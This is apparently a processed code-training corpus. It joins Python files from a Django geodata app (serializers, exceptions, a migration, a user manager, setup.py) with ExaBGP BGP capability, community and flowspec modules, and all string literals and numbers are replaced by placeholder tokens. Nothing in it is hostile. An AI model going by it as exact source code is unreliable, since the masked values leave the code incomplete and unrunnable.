, '<STR_LIT>' , '<STR_LIT>' ) <EOL> def create ( self , validated_data ) : <EOL> """<STR_LIT>""" <EOL> validated_data [ '<STR_LIT>' ] = self . context . get ( '<STR_LIT:user>' ) <EOL> return super ( <EOL> LocationContributionSerializer , <EOL> self <EOL> ) . create ( validated_data ) <EOL> class ContributionSerializer ( BaseSerializer ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def many_init ( cls , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = True <EOL> return super ( ContributionSerializer , cls ) . many_init ( * args , ** kwargs ) <EOL> def validate_category ( self , project , category_id ) : <EOL> """<STR_LIT>""" <EOL> errors = [ ] <EOL> category = None <EOL> try : <EOL> category = project . categories . get ( pk = category_id ) <EOL> if category . status == '<STR_LIT>' : <EOL> errors . append ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> self . _validated_data [ '<STR_LIT>' ] [ '<STR_LIT>' ] = category <EOL> except Category . DoesNotExist : <EOL> errors . append ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if errors : <EOL> self . _errors [ '<STR_LIT>' ] = errors <EOL> return category <EOL> def replace_null ( self , properties ) : <EOL> """<STR_LIT>""" <EOL> for key , value in properties . iteritems ( ) : <EOL> if isinstance ( value , ( str , unicode ) ) and len ( value ) == <NUM_LIT:0> : <EOL> properties [ key ] = None <EOL> return properties <EOL> def validate_properties ( self , properties , category = None , status = None ) : <EOL> """<STR_LIT>""" <EOL> errors = [ ] <EOL> if self . instance : <EOL> status = status or self . instance . status <EOL> if self . instance . properties : <EOL> update = self . instance . properties . copy ( ) <EOL> update . update ( properties ) <EOL> properties = update <EOL> else : <EOL> status = status or category . default_status <EOL> properties = self . replace_null ( properties ) <EOL> try : <EOL> if status == '<STR_LIT>' : <EOL> Observation . validate_partial ( category , properties ) <EOL> else : <EOL> Observation . validate_full ( category , properties ) <EOL> except ValidationError , e : <EOL> errors . append ( e ) <EOL> self . _validated_data [ '<STR_LIT>' ] = properties <EOL> self . _validated_data [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] = status <EOL> if errors : <EOL> self . _errors [ '<STR_LIT>' ] = errors <EOL> def validate_location ( self , project , location_id ) : <EOL> """<STR_LIT>""" <EOL> errors = [ ] <EOL> self . location = None <EOL> try : <EOL> if location_id is not None : <EOL> self . location = Location . objects . get_single ( <EOL> self . context . get ( '<STR_LIT:user>' ) , <EOL> project . id , <EOL> location_id <EOL> ) <EOL> except PermissionDenied , error : <EOL> errors . append ( error ) <EOL> except Location . DoesNotExist , error : <EOL> errors . append ( error ) <EOL> if errors : <EOL> self . _errors [ '<STR_LIT:location>' ] = errors <EOL> def is_valid ( self , raise_exception = False ) : <EOL> """<STR_LIT>""" <EOL> self . _errors = { } <EOL> self . _validated_data = self . initial_data <EOL> project = self . context . get ( '<STR_LIT>' ) <EOL> meta = self . initial_data . get ( '<STR_LIT>' ) <EOL> if meta is None : <EOL> self . _validated_data [ '<STR_LIT>' ] = dict ( ) <EOL> location_id = None <EOL> if self . initial_data . get ( '<STR_LIT:location>' ) is not None : <EOL> location_id = self . initial_data . get ( '<STR_LIT:location>' ) . get ( '<STR_LIT:id>' ) <EOL> self . validate_location ( project , location_id ) <EOL> category = None <EOL> if self . instance is None and meta is not None : <EOL> category = self . validate_category ( project , meta . get ( '<STR_LIT>' ) ) <EOL> else : <EOL> category = self . instance . category <EOL> self . _validated_data [ '<STR_LIT>' ] [ '<STR_LIT>' ] = category <EOL> properties = self . initial_data . get ( '<STR_LIT>' ) or { } <EOL> status = None <EOL> if meta is not None : <EOL> status = meta . get ( '<STR_LIT:status>' , None ) <EOL> if properties is not None and category is not None : <EOL> self . validate_properties ( <EOL> properties , <EOL> category = category , <EOL> status = status <EOL> ) <EOL> if self . _errors and raise_exception : <EOL> raise ValidationError ( self . _errors ) <EOL> return not bool ( self . _errors ) <EOL> def create ( self , validated_data ) : <EOL> """<STR_LIT>""" <EOL> project = self . context . get ( '<STR_LIT>' ) <EOL> meta = validated_data . pop ( '<STR_LIT>' ) <EOL> location_serializer = LocationContributionSerializer ( <EOL> self . location , <EOL> data = validated_data . pop ( '<STR_LIT:location>' , None ) , <EOL> context = self . context <EOL> ) <EOL> if location_serializer . is_valid ( ) : <EOL> location_serializer . save ( ) <EOL> self . instance = Observation . create ( <EOL> properties = validated_data . get ( '<STR_LIT>' ) , <EOL> creator = self . context . get ( '<STR_LIT:user>' ) , <EOL> location = location_serializer . instance , <EOL> project = project , <EOL> category = meta . get ( '<STR_LIT>' ) , <EOL> status = meta . pop ( '<STR_LIT:status>' , None ) <EOL> ) <EOL> return self . instance <EOL> def update ( self , instance , validated_data ) : <EOL> """<STR_LIT>""" <EOL> meta = validated_data . get ( '<STR_LIT>' ) <EOL> status = None <EOL> if meta is not None : <EOL> status = meta . get ( '<STR_LIT:status>' , None ) <EOL> location_serializer = LocationContributionSerializer ( <EOL> instance . location , <EOL> data = validated_data . pop ( '<STR_LIT:location>' , { } ) , <EOL> context = self . context , <EOL> partial = True <EOL> ) <EOL> if location_serializer . is_valid ( ) : <EOL> location_serializer . save ( ) <EOL> return instance . update ( <EOL> properties = validated_data . get ( '<STR_LIT>' ) , <EOL> updator = self . context . get ( '<STR_LIT:user>' ) , <EOL> status = status <EOL> ) <EOL> def get_display_field ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> if obj . display_field is not None : <EOL> display_field = obj . display_field . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> value = display_field [ <NUM_LIT:1> ] if display_field [ <NUM_LIT:1> ] != '<STR_LIT:None>' else None <EOL> return { <EOL> '<STR_LIT:key>' : display_field [ <NUM_LIT:0> ] , <EOL> '<STR_LIT:value>' : value <EOL> } <EOL> else : <EOL> return None <EOL> def to_representation ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> location = obj . location <EOL> isowner = False <EOL> if not self . context . get ( '<STR_LIT:user>' ) . is_anonymous ( ) : <EOL> isowner = obj . creator == self . context . get ( '<STR_LIT:user>' ) <EOL> updator = None <EOL> if obj . updator is not None : <EOL> updator = { <EOL> '<STR_LIT:id>' : obj . updator . id , <EOL> '<STR_LIT>' : obj . updator . display_name <EOL> } <EOL> feature = { <EOL> '<STR_LIT:id>' : obj . id , <EOL> '<STR_LIT>' : obj . properties , <EOL> '<STR_LIT>' : self . get_display_field ( obj ) , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:status>' : obj . status , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : obj . creator . id , <EOL> '<STR_LIT>' : obj . creator . display_name <EOL> } , <EOL> '<STR_LIT>' : updator , <EOL> '<STR_LIT>' : str ( obj . created_at ) , <EOL> '<STR_LIT>' : str ( obj . updated_at ) , <EOL> '<STR_LIT:version>' : obj . version , <EOL> '<STR_LIT>' : isowner , <EOL> '<STR_LIT>' : obj . num_media , <EOL> '<STR_LIT>' : obj . num_comments <EOL> } , <EOL> '<STR_LIT:location>' : { <EOL> '<STR_LIT:id>' : location . id , <EOL> '<STR_LIT:name>' : location . name , <EOL> '<STR_LIT:description>' : location . description , <EOL> '<STR_LIT>' : location . geometry . geojson <EOL> } <EOL> } <EOL> if self . context . get ( '<STR_LIT>' ) : <EOL> cat = obj . category <EOL> feature [ '<STR_LIT>' ] [ '<STR_LIT>' ] = { <EOL> '<STR_LIT:id>' : cat . id , <EOL> '<STR_LIT:name>' : cat . name , <EOL> '<STR_LIT:description>' : cat . description , <EOL> '<STR_LIT>' : cat . symbol . url if cat . symbol else None , <EOL> '<STR_LIT>' : cat . colour <EOL> } <EOL> else : <EOL> category_serializer = CategorySerializer ( <EOL> obj . category , context = self . context ) <EOL> feature [ '<STR_LIT>' ] [ '<STR_LIT>' ] = category_serializer . data <EOL> comment_serializer = CommentSerializer ( <EOL> obj . comments . filter ( respondsto = None ) , <EOL> many = True , <EOL> context = self . context <EOL> ) <EOL> feature [ '<STR_LIT>' ] = comment_serializer . data <EOL> review_serializer = CommentSerializer ( <EOL> obj . comments . filter ( review_status = '<STR_LIT>' ) , <EOL> many = True , <EOL> context = self . context <EOL> ) <EOL> feature [ '<STR_LIT>' ] = review_serializer . data <EOL> file_serializer = FileSerializer ( <EOL> obj . files_attached . all ( ) , <EOL> many = True , <EOL> context = self . context <EOL> ) <EOL> feature [ '<STR_LIT>' ] = file_serializer . data <EOL> return feature <EOL> class CommentSerializer ( serializers . ModelSerializer ) : <EOL> """<STR_LIT>""" <EOL> creator = UserSerializer ( fields = ( '<STR_LIT:id>' , '<STR_LIT>' ) , read_only = True ) <EOL> isowner = serializers . SerializerMethodField ( ) <EOL> class Meta : <EOL> model = Comment <EOL> fields = ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:text>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> read_only = ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def to_representation ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> native = super ( CommentSerializer , self ) . to_representation ( obj ) <EOL> native [ '<STR_LIT>' ] = CommentSerializer ( <EOL> obj . responses . all ( ) , <EOL> many = True , <EOL> context = self . context <EOL> ) . data <EOL> return native <EOL> def get_isowner ( self , comment ) : <EOL> """<STR_LIT>""" <EOL> if not self . context . get ( '<STR_LIT:user>' ) . is_anonymous ( ) : <EOL> return comment . creator == self . context . get ( '<STR_LIT:user>' ) <EOL> else : <EOL> return False <EOL> class FileSerializer ( serializers . ModelSerializer ) : <EOL> """<STR_LIT>""" <EOL> creator = UserSerializer ( fields = ( '<STR_LIT:id>' , '<STR_LIT>' ) ) <EOL> isowner = serializers . SerializerMethodField ( ) <EOL> url = serializers . SerializerMethodField ( ) <EOL> file_type = serializers . SerializerMethodField ( ) <EOL> thumbnail_url = serializers . SerializerMethodField ( ) <EOL> class Meta : <EOL> model = MediaFile <EOL> fields = ( <EOL> '<STR_LIT:id>' , '<STR_LIT:name>' , '<STR_LIT:description>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:url>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> def get_file_type ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> return obj . type_name <EOL> def get_isowner ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> if not self . context . get ( '<STR_LIT:user>' ) . is_anonymous ( ) : <EOL> return obj . creator == self . context . get ( '<STR_LIT:user>' ) <EOL> else : <EOL> return False <EOL> def get_url ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( obj , ImageFile ) : <EOL> return obj . image . url <EOL> elif isinstance ( obj , VideoFile ) : <EOL> return obj . youtube_link <EOL> elif isinstance ( obj , AudioFile ) : <EOL> return obj . audio . url <EOL> def _get_thumb ( self , image , size = ( <NUM_LIT> , <NUM_LIT> ) ) : <EOL> """<STR_LIT>""" <EOL> thumbnailer = get_thumbnailer ( image ) <EOL> thumb = thumbnailer . get_thumbnail ( { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:size>' : size <EOL> } ) <EOL> return thumb <EOL> def get_thumbnail_url ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( obj , ImageFile ) : <EOL> try : <EOL> return self . _get_thumb ( obj . image ) . url <EOL> except ( <EOL> IOError , <EOL> InvalidImageFormatError <EOL> ) : <EOL> return '<STR_LIT>' <EOL> elif isinstance ( obj , VideoFile ) : <EOL> if obj . thumbnail : <EOL> return self . _get_thumb ( obj . thumbnail ) . url <EOL> request = requests . get ( <EOL> '<STR_LIT>' % obj . youtube_id , <EOL> stream = True <EOL> ) <EOL> if request . status_code != requests . codes . ok : <EOL> return '<STR_LIT>' <EOL> lf = tempfile . NamedTemporaryFile ( ) <EOL> for block in request . iter_content ( <NUM_LIT> * <NUM_LIT:8> ) : <EOL> if not block : <EOL> break <EOL> lf . write ( block ) <EOL> file_name = obj . youtube_id + '<STR_LIT>' <EOL> obj . thumbnail . save ( file_name , files . File ( lf ) ) <EOL> from PIL import Image <EOL> w , h = Image . open ( obj . thumbnail ) . size <EOL> thumb = self . _get_thumb ( obj . thumbnail , size = ( h , h ) ) <EOL> obj . thumbnail . save ( file_name , thumb ) <EOL> return self . _get_thumb ( obj . thumbnail ) . url <EOL> elif isinstance ( obj , AudioFile ) : <EOL> return '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> class Unauthenticated ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class MalformedRequestData ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class InputError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class FileTypeError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( default = b'<STR_LIT>' , max_length = <NUM_LIT:20> , choices = [ ( b'<STR_LIT:true>' , b'<STR_LIT:true>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT:false>' , b'<STR_LIT:false>' ) ] ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> from django . contrib . auth . models import BaseUserManager <EOL> from django . utils import timezone <EOL> class UserManager ( BaseUserManager ) : <EOL> """<STR_LIT>""" <EOL> def create_user ( self , email , display_name , password = None , is_active = True , <EOL> ** extra_fields ) : <EOL> """<STR_LIT>""" <EOL> now = timezone . now ( ) <EOL> email = UserManager . normalize_email ( email ) <EOL> user = self . model ( email = email , display_name = display_name , <EOL> is_active = is_active , last_login = now , date_joined = now , <EOL> ** extra_fields ) <EOL> user . set_password ( password ) <EOL> user . save ( using = self . _db ) <EOL> return user <EOL> def create_superuser ( self , email , display_name , password , ** extra_fields ) : <EOL> """<STR_LIT>""" <EOL> user = self . create_user ( email , display_name , password = password , <EOL> ** extra_fields ) <EOL> user . is_superuser = True <EOL> user . save ( ) <EOL> return user <EOL> def get_by_natural_key ( self , username ) : <EOL> """<STR_LIT>""" <EOL> return self . get ( email__iexact = username ) </s>
<s> """<STR_LIT>""" <EOL> from os . path import join <EOL> from setuptools import setup , find_packages <EOL> from geokey . version import get_version <EOL> name = '<STR_LIT>' <EOL> version = get_version ( ) <EOL> repository = join ( '<STR_LIT>' , name ) <EOL> def get_install_requires ( ) : <EOL> """<STR_LIT>""" <EOL> requirements = list ( ) <EOL> for line in open ( '<STR_LIT>' ) . readlines ( ) : <EOL> if line . startswith ( '<STR_LIT:#>' ) or line . startswith ( '<STR_LIT>' ) or line == '<STR_LIT>' : <EOL> continue <EOL> requirements . append ( line . rstrip ( ) ) <EOL> return requirements <EOL> setup ( <EOL> name = name , <EOL> version = version , <EOL> description = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> download_url = join ( repository , '<STR_LIT>' , version ) , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> install_requires = get_install_requires ( ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from exabgp . protocol . family import AFI <EOL> from exabgp . protocol . family import SAFI <EOL> from exabgp . bgp . message . open . capability . capability import Capability <EOL> from exabgp . bgp . message . open . capability . addpath import AddPath <EOL> from exabgp . bgp . message . open . capability . asn4 import ASN4 <EOL> from exabgp . bgp . message . open . capability . graceful import Graceful <EOL> from exabgp . bgp . message . open . capability . mp import MultiProtocol <EOL> from exabgp . bgp . message . open . capability . ms import MultiSession <EOL> from exabgp . bgp . message . open . capability . operational import Operational <EOL> from exabgp . bgp . message . open . capability . refresh import RouteRefresh <EOL> from exabgp . bgp . message . open . capability . refresh import EnhancedRouteRefresh <EOL> from exabgp . bgp . message . open . capability . hostname import HostName <EOL> from exabgp . bgp . message . notification import Notify <EOL> class Parameter ( int ) : <EOL> AUTHENTIFICATION_INFORMATION = <NUM_LIT> <EOL> CAPABILITIES = <NUM_LIT> <EOL> def __str__ ( self ) : <EOL> if self == <NUM_LIT> : <EOL> return "<STR_LIT>" <EOL> if self == <NUM_LIT> : <EOL> return "<STR_LIT>" <EOL> return '<STR_LIT>' <EOL> class Capabilities ( dict ) : <EOL> def announced ( self , capability ) : <EOL> return capability in self <EOL> def __str__ ( self ) : <EOL> r = [ ] <EOL> for key in sorted ( self . keys ( ) ) : <EOL> r . append ( str ( self [ key ] ) ) <EOL> return '<STR_LIT:U+002CU+0020>' . join ( r ) <EOL> def _protocol ( self , neighbor ) : <EOL> families = neighbor . families ( ) <EOL> mp = MultiProtocol ( ) <EOL> mp . extend ( families ) <EOL> self [ Capability . CODE . MULTIPROTOCOL ] = mp <EOL> def _asn4 ( self , neighbor ) : <EOL> if not neighbor . asn4 : <EOL> return <EOL> self [ Capability . CODE . FOUR_BYTES_ASN ] = ASN4 ( neighbor . local_as ) <EOL> def _addpath ( self , neighbor ) : <EOL> if not neighbor . add_path : <EOL> return <EOL> families = neighbor . families ( ) <EOL> ap_families = [ ] <EOL> if ( AFI ( AFI . ipv4 ) , SAFI ( SAFI . unicast ) ) in families : <EOL> ap_families . append ( ( AFI ( AFI . ipv4 ) , SAFI ( SAFI . unicast ) ) ) <EOL> if ( AFI ( AFI . ipv6 ) , SAFI ( SAFI . unicast ) ) in families : <EOL> ap_families . append ( ( AFI ( AFI . ipv6 ) , SAFI ( SAFI . unicast ) ) ) <EOL> if ( AFI ( AFI . ipv4 ) , SAFI ( SAFI . nlri_mpls ) ) in families : <EOL> ap_families . append ( ( AFI ( AFI . ipv4 ) , SAFI ( SAFI . nlri_mpls ) ) ) <EOL> if ( AFI ( AFI . ipv6 ) , SAFI ( SAFI . unicast ) ) in families : <EOL> ap_families . append ( ( AFI ( AFI . ipv6 ) , SAFI ( SAFI . unicast ) ) ) <EOL> self [ Capability . CODE . ADD_PATH ] = AddPath ( ap_families , neighbor . add_path ) <EOL> def _graceful ( self , neighbor , restarted ) : <EOL> if not neighbor . graceful_restart : <EOL> return <EOL> self [ Capability . CODE . GRACEFUL_RESTART ] = Graceful ( ) . set ( <EOL> Graceful . RESTART_STATE if restarted else <NUM_LIT> , <EOL> neighbor . graceful_restart , <EOL> [ ( afi , safi , Graceful . FORWARDING_STATE ) for ( afi , safi ) in neighbor . families ( ) ] <EOL> ) <EOL> def _refresh ( self , neighbor ) : <EOL> if not neighbor . route_refresh : <EOL> return <EOL> self [ Capability . CODE . ROUTE_REFRESH ] = RouteRefresh ( ) <EOL> self [ Capability . CODE . ENHANCED_ROUTE_REFRESH ] = EnhancedRouteRefresh ( ) <EOL> def _hostname ( self , neighbor ) : <EOL> self [ Capability . CODE . HOSTNAME ] = HostName ( neighbor . host_name , neighbor . domain_name ) <EOL> def _operational ( self , neighbor ) : <EOL> if not neighbor . operational : <EOL> return <EOL> self [ Capability . CODE . OPERATIONAL ] = Operational ( ) <EOL> def _session ( self , neighbor ) : <EOL> if not neighbor . multisession : <EOL> return <EOL> self [ Capability . CODE . MULTISESSION ] = MultiSession ( ) . set ( [ Capability . CODE . MULTIPROTOCOL ] ) <EOL> def new ( self , neighbor , restarted ) : <EOL> self . _protocol ( neighbor ) <EOL> self . _asn4 ( neighbor ) <EOL> self . _addpath ( neighbor ) <EOL> self . _graceful ( neighbor , restarted ) <EOL> self . _refresh ( neighbor ) <EOL> self . _operational ( neighbor ) <EOL> self . _session ( neighbor ) <EOL> return self <EOL> def pack ( self ) : <EOL> rs = [ ] <EOL> for k , capabilities in self . iteritems ( ) : <EOL> for capability in capabilities . extract ( ) : <EOL> rs . append ( "<STR_LIT>" % ( chr ( k ) , chr ( len ( capability ) ) , capability ) ) <EOL> parameters = "<STR_LIT>" . join ( [ "<STR_LIT>" % ( chr ( <NUM_LIT:2> ) , chr ( len ( r ) ) , r ) for r in rs ] ) <EOL> return "<STR_LIT>" % ( chr ( len ( parameters ) ) , parameters ) <EOL> @ staticmethod <EOL> def unpack ( data ) : <EOL> def _key_values ( name , data ) : <EOL> if len ( data ) < <NUM_LIT:2> : <EOL> raise Notify ( <NUM_LIT:2> , <NUM_LIT:0> , "<STR_LIT>" % ( name , Capability . hex ( data ) ) ) <EOL> l = ord ( data [ <NUM_LIT:1> ] ) <EOL> boundary = l + <NUM_LIT:2> <EOL> if len ( data ) < boundary : <EOL> raise Notify ( <NUM_LIT:2> , <NUM_LIT:0> , "<STR_LIT>" % ( name , Capability . hex ( data ) ) ) <EOL> key = ord ( data [ <NUM_LIT:0> ] ) <EOL> value = data [ <NUM_LIT:2> : boundary ] <EOL> rest = data [ boundary : ] <EOL> return key , value , rest <EOL> capabilities = Capabilities ( ) <EOL> option_len = ord ( data [ <NUM_LIT:0> ] ) <EOL> if option_len : <EOL> data = data [ <NUM_LIT:1> : ] <EOL> while data : <EOL> key , value , data = _key_values ( '<STR_LIT>' , data ) <EOL> if key == Parameter . AUTHENTIFICATION_INFORMATION : <EOL> raise Notify ( <NUM_LIT:2> , <NUM_LIT:5> ) <EOL> if key == Parameter . CAPABILITIES : <EOL> while value : <EOL> capability , capv , value = _key_values ( '<STR_LIT>' , value ) <EOL> capabilities [ capability ] = Capability . unpack ( capability , capabilities , capv ) <EOL> else : <EOL> raise Notify ( <NUM_LIT:2> , <NUM_LIT:0> , '<STR_LIT>' % hex ( key ) ) <EOL> return capabilities </s>
<s> """<STR_LIT>""" <EOL> from struct import pack <EOL> from struct import unpack <EOL> class Community ( object ) : <EOL> MAX = <NUM_LIT> <EOL> NO_EXPORT = pack ( '<STR_LIT>' , <NUM_LIT> ) <EOL> NO_ADVERTISE = pack ( '<STR_LIT>' , <NUM_LIT> ) <EOL> NO_EXPORT_SUBCONFED = pack ( '<STR_LIT>' , <NUM_LIT> ) <EOL> NO_PEER = pack ( '<STR_LIT>' , <NUM_LIT> ) <EOL> cache = { } <EOL> caching = True <EOL> __slots__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , community ) : <EOL> self . community = community <EOL> if community == self . NO_EXPORT : <EOL> self . _str = '<STR_LIT>' <EOL> elif community == self . NO_ADVERTISE : <EOL> self . _str = '<STR_LIT>' <EOL> elif community == self . NO_EXPORT_SUBCONFED : <EOL> self . _str = '<STR_LIT>' <EOL> else : <EOL> self . _str = "<STR_LIT>" % unpack ( '<STR_LIT>' , self . community ) <EOL> def __eq__ ( self , other ) : <EOL> return self . community == other . community <EOL> def __ne__ ( self , other ) : <EOL> return self . community != other . community <EOL> def __lt__ ( self , other ) : <EOL> return self . community < other . community <EOL> def __le__ ( self , other ) : <EOL> return self . community <= other . community <EOL> def __gt__ ( self , other ) : <EOL> return self . community > other . community <EOL> def __ge__ ( self , other ) : <EOL> return self . community >= other . community <EOL> def json ( self ) : <EOL> return "<STR_LIT>" % unpack ( '<STR_LIT>' , self . community ) <EOL> def pack ( self , negotiated = None ) : <EOL> return self . community <EOL> def __repr__ ( self ) : <EOL> return self . _str <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:4> <EOL> @ classmethod <EOL> def unpack ( cls , community , negotiated ) : <EOL> return cls ( community ) <EOL> @ classmethod <EOL> def cached ( cls , community ) : <EOL> if cls . caching and community in cls . cache : <EOL> return cls . cache [ community ] <EOL> instance = cls ( community ) <EOL> if cls . caching : <EOL> cls . cache [ community ] = instance <EOL> return instance <EOL> if not Community . cache : <EOL> Community . cache [ Community . NO_EXPORT ] = Community ( Community . NO_EXPORT ) <EOL> Community . cache [ Community . NO_ADVERTISE ] = Community ( Community . NO_ADVERTISE ) <EOL> Community . cache [ Community . NO_EXPORT_SUBCONFED ] = Community ( Community . NO_EXPORT_SUBCONFED ) <EOL> Community . cache [ Community . NO_PEER ] = Community ( Community . NO_PEER ) </s>
<s> """<STR_LIT>""" <EOL> from struct import pack <EOL> from struct import unpack <EOL> from exabgp . protocol . ip import NoNextHop <EOL> from exabgp . protocol . family import AFI <EOL> from exabgp . protocol . family import SAFI <EOL> from exabgp . bgp . message . direction import OUT <EOL> from exabgp . bgp . message . notification import Notify <EOL> from exabgp . bgp . message . update . nlri . cidr import CIDR <EOL> from exabgp . protocol import Protocol <EOL> from exabgp . protocol . ip . icmp import ICMPType <EOL> from exabgp . protocol . ip . icmp import ICMPCode <EOL> from exabgp . protocol . ip . fragment import Fragment <EOL> from exabgp . protocol . ip . tcp . flag import TCPFlag <EOL> from exabgp . bgp . message . update . nlri . nlri import NLRI <EOL> from exabgp . bgp . message . update . nlri . qualifier import RouteDistinguisher <EOL> class IComponent ( object ) : <EOL> FLAG = False <EOL> class CommonOperator ( object ) : <EOL> power = { <NUM_LIT:0> : <NUM_LIT:1> , <NUM_LIT:1> : <NUM_LIT:2> , <NUM_LIT:2> : <NUM_LIT:4> , <NUM_LIT:3> : <NUM_LIT:8> , } <EOL> rewop = { <NUM_LIT:1> : <NUM_LIT:0> , <NUM_LIT:2> : <NUM_LIT:1> , <NUM_LIT:4> : <NUM_LIT:2> , <NUM_LIT:8> : <NUM_LIT:3> , } <EOL> len_position = <NUM_LIT> <EOL> EOL = <NUM_LIT> <EOL> AND = <NUM_LIT> <EOL> LEN = <NUM_LIT> <EOL> NOP = <NUM_LIT> <EOL> OPERATOR = <NUM_LIT> ^ ( EOL | LEN ) <EOL> @ staticmethod <EOL> def eol ( data ) : <EOL> return data & CommonOperator . EOL <EOL> @ staticmethod <EOL> def operator ( data ) : <EOL> return data & CommonOperator . OPERATOR <EOL> @ staticmethod <EOL> def length ( data ) : <EOL> return <NUM_LIT:1> << ( ( data & CommonOperator . LEN ) >> <NUM_LIT:4> ) <EOL> class NumericOperator ( CommonOperator ) : <EOL> LT = <NUM_LIT> <EOL> GT = <NUM_LIT> <EOL> EQ = <NUM_LIT> <EOL> class BinaryOperator ( CommonOperator ) : <EOL> NOT = <NUM_LIT> <EOL> MATCH = <NUM_LIT> <EOL> INCLUDE = <NUM_LIT> <EOL> def _len_to_bit ( value ) : <EOL> return NumericOperator . rewop [ value ] << <NUM_LIT:4> <EOL> def _bit_to_len ( value ) : <EOL> return NumericOperator . power [ ( value & CommonOperator . len_position ) >> <NUM_LIT:4> ] <EOL> def _number ( string ) : <EOL> value = <NUM_LIT:0> <EOL> for c in string : <EOL> value = ( value << <NUM_LIT:8> ) + ord ( c ) <EOL> return value <EOL> class IPv4 ( object ) : <EOL> afi = AFI . ipv4 <EOL> class IPv6 ( object ) : <EOL> afi = AFI . ipv6 <EOL> class IPrefix ( object ) : <EOL> pass <EOL> class IPrefix4 ( IPrefix , IComponent , IPv4 ) : <EOL> CODE = - <NUM_LIT:1> <EOL> NAME = '<STR_LIT>' <EOL> operations = <NUM_LIT> <EOL> def __init__ ( self , raw , netmask ) : <EOL> self . cidr = CIDR ( raw , netmask ) <EOL> def pack ( self ) : <EOL> raw = self . cidr . pack_nlri ( ) <EOL> return "<STR_LIT>" % ( chr ( self . ID ) , raw ) <EOL> def __str__ ( self ) : <EOL> return str ( self . cidr ) <EOL> @ classmethod <EOL> def make ( cls , bgp ) : <EOL> prefix , mask = CIDR . decode ( AFI . ipv4 , bgp ) <EOL> return cls ( prefix , mask ) , bgp [ CIDR . size ( mask ) + <NUM_LIT:1> : ] <EOL> class IPrefix6 ( IPrefix , IComponent , IPv6 ) : <EOL> CODE = - <NUM_LIT:1> <EOL> NAME = '<STR_LIT>' <EOL> operations = <NUM_LIT> <EOL> def __init__ ( self , raw , netmask , offset ) : <EOL> self . cidr = CIDR ( raw , netmask ) <EOL> self . offset = offset <EOL> def pack ( self ) : <EOL> return "<STR_LIT>" % ( chr ( self . ID ) , chr ( self . cidr . mask ) , chr ( self . offset ) , self . cidr . pack_ip ( ) ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . cidr , self . offset ) <EOL> @ classmethod <EOL> def make ( cls , bgp ) : <EOL> offset = ord ( bgp [ <NUM_LIT:1> ] ) <EOL> prefix , mask = CIDR . decode ( AFI . ipv6 , bgp [ <NUM_LIT:0> ] + bgp [ <NUM_LIT:2> : ] ) <EOL> return cls ( prefix , mask , offset ) , bgp [ CIDR . size ( mask ) + <NUM_LIT:2> : ] <EOL> class IOperation ( IComponent ) : <EOL> def __init__ ( self , operations , value ) : <EOL> self . operations = operations <EOL> self . value = value <EOL> self . first = None <EOL> def pack ( self ) : <EOL> l , v = self . encode ( self . value ) <EOL> op = self . operations | _len_to_bit ( l ) <EOL> return "<STR_LIT>" % ( chr ( op ) , v ) <EOL> def encode ( self , value ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def decode ( self , value ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> class IOperationByte ( IOperation ) : <EOL> def encode ( self , value ) : <EOL> return <NUM_LIT:1> , chr ( value ) <EOL> def decode ( self , bgp ) : <EOL> return ord ( bgp [ <NUM_LIT:0> ] ) , bgp [ <NUM_LIT:1> : ] <EOL> class IOperationByteShort ( IOperation ) : <EOL> def encode ( self , value ) : <EOL> if value < ( <NUM_LIT:1> << <NUM_LIT:8> ) : <EOL> return <NUM_LIT:1> , chr ( value ) <EOL> return <NUM_LIT:2> , pack ( '<STR_LIT>' , value ) <EOL> def decode ( self , bgp ) : <EOL> return unpack ( '<STR_LIT>' , bgp [ : <NUM_LIT:2> ] ) [ <NUM_LIT:0> ] , bgp [ <NUM_LIT:2> : ] <EOL> class NumericString ( 